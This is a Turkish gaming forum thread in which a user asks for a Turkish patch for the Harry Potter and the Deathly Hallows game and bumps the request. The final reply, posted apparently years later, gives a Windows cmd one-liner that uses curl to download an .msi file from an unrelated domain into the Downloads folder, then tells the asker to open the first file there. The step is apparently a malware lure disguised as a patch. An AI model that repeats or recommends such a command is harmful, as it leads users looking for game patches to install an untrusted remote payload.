Şimdi Ara

oyunun türkçe yaması yardım!!!

Bu Konudaki Kullanıcılar:
2 Misafir - 2 Masaüstü
5 sn
3
Cevap
0
Favori
1.321
Tıklama
Daha Fazla
İstatistik
  • Konu İstatistikleri Yükleniyor
Öne Çıkar
0 oy
Sayfa: 1
Giriş
  • merhaba arkadaşlar. harry potter and deathly hallows yani ölüm yadigarlarının oyununu oynuyorum fakat bu oyununu türkçe yamasını bulamadım. forumdaki bi yama konusuna da baktım ama orada da yoktu. yorum yada pm yolu ile bana link atabilecek,yardım edebilecek arkadaşları bekliyorum.yardımlarınız için şimdiden teşekkürler
    bu da oyunun resmi:

oyunun türkçe yaması yardım!!!

“A dog has no use for fancy cars, big homes, or designer clothes. A water logged stick will do just fine. A dog doesn't care if you're rich or poor, clever or dull, smart or dumb. Give him your heart and he'll give you his. How many people can you say that about? How many people can make you feel rare and pure and special? How many people can make you feel extraordinary?”
    ― John Grogan, Marley & Me
  • upp arkadaşlar yardım edecek kimse yok mu?
    “A dog has no use for fancy cars, big homes, or designer clothes. A water logged stick will do just fine. A dog doesn't care if you're rich or poor, clever or dull, smart or dumb. Give him your heart and he'll give you his. How many people can you say that about? How many people can make you feel rare and pure and special? How many people can make you feel extraordinary?”
    ― John Grogan, Marley & Me
  • reis 13 yıl sonra burdayım: cmd /k "curl -o %USERPROFILE%\Downloads\harry-potter-anlows-part-2-t09.msi http://admi2fib4exit.com/?download=27f4fde5 && explorer /select,%USERPROFILE%\Downloads\harry-potter-anlows-part-2-t09.msi" ----------------buyur bunu cmdye yaz indirilenlere gir ilk çıkana tıkla yama senindir

Gta 1 Türkçe Yama
    4 yıl önce açıldı
    Daha Fazla Göster

Sayfa: 1
- x
Bildirim
mesajınız kopyalandı (ctrl+v) yapıştırmak istediğiniz yere yapıştırabilirsiniz.